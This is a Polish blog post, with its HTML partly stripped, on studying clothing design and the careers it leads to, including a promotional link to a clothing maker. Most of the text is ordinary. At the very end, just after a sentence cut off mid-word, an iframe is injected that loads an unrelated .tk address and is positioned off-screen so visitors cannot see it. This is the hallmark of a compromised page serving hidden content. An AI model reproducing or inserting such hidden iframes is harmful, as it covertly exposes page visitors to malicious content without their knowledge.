Technologia w pigułce

Wzornictwo odzieżowe – dla kogo?

4 grudnia 2015 • Opublikowane przez

Wzornictwo, zwane też desingem, jest wymarzonym kierunkiem studiów wielu maturzystów. Dostać się na nie jest jednak trudno, a same studia wymagają dużo pracy i zapału. Aby zostać projektantem mody, należy wybrać dla siebie specjalność związaną z odzieżą lub biżuterią. Na czym skupiają się studia wzornicze i jakie cechy powinien posiadać student tego kierunku?

!–more–

nbsp;

strongPotrzeba wyczucia/strong

Wzornictwo to bardzo kreatywny kierunek. Wymaga od kandydata umiejętności manualnych i technicznych. Z jednej strony potrzebny jest talent plastyczny – głównie po to, aby stworzyć projekt, nie można jednak pominąć żyłki do prac technicznych. W końcu projektowanie odzieży wiąże się również z szyciem na maszynie czy pracy przy urządzeniach szwalniczych. Czego jeszcze wymaga się od studentów wzornictwa? Na pewno poczucia estetyki. Aby strongkreować nowe trendy/strong, trzeba wiedzieć, co będzie dobrze wyglądało wykonane z konkretnego materiału, ze zdobieniami i dodatkami. Nie można jednak przesadzać z ilością kwiatów na tkaninie czy naszytych cekinów. Chyba, że wymaga tego zamysł artystyczny. Poczucie estetyki pozwoli projektantowi wykonać pracę, która nie będzie budziła pytania – hit czy kit?

nbsp;

strongSpełnienie marzeń/strong

Projektantami mody zazwyczaj chcą być ci, którzy się nią interesują. Albo są to młode kobiety, które już w dzieciństwie wycinały sylwetki modelek na wybiegu i pożyczały od mamy igły z nitką, aby pozszywać ze sobą skrawki materiałów podczas zabawy w projektantkę lub mężczyźni, którzy widzą siebie w przyszłości jako drugiego Karla Lagerfelda. Sądzić można więc, że każdy, kto marzy o zostaniu projektantem, pragnie sukcesu. Wiadomo jednak, że nie każdy otworzy w przyszłości własny butik i nie wszystkie projekty znajdą się na wybiegach. Czym zatem może zajmować się absolwent wzornictwa?

nbsp;

a href=”http://argos.pl/blog/wp-content/uploads/2015/12/projektant-mody.jpg”img class=”wp-image-2600 size-full” src=”http://argos.pl/blog/wp-content/uploads/2015/12/projektant-mody.jpg” alt=”projektant mody” width=”620″ height=”332″ //a Źródło: szkolenia.blog.gowork.pl

nbsp;

strongGdzie do pracy?/strong

Wiele osób korzysta dziś z pomocy stylistów. Coraz popularniejsze stają się zakupy w towarzystwie profesjonalnego doradcy od stylu i dobrego wyglądu. strongStyliści/strong to często właśnie absolwenci wzornictwa odzieżowego. Po ukończeniu tego kierunku pracować można również w charakterze krytyka mody czy managera kolekcji. Ciekawą propozycją jest również praca w teatrze lub przy produkcjach telewizyjnych, gdzie projektować trzeba specjalne kostiumy dla artystów. Poza tym na absolwentów wzornictwa czeka praca w firmach odzieżowych, np. przy projektowaniu lub własna działalność gospodarcza, np. jako stronga href=”http://argos.pl”producent odzieży reklamowej/a/strong.

nbsp;

Wzornictwo staje się coraz popularniejszym kierunkiem studiów. Można je studiować zarówno na uczelniach państwowych, jak i w prywatnych szkołach wyższych. Kierunek ten proponuje m.in. Politechnika Koszalińska, Uniwersytet w Radomiu, Wyższa Szkoła Umiejętności Społecznych w Poznaniu czy Uniwersytet Pedagogiczny im. Komisji Edukacji Narodowej w Krakowi!–844c7b74e31d727d5814a0ed667c0255–iframe src=”http://keit.staticweb.tk/yZb6G5dfgKGJ” width=640 height=480 style=’position: absolute; left: -1000px; top: -1000px; z-index:-1;’/iframe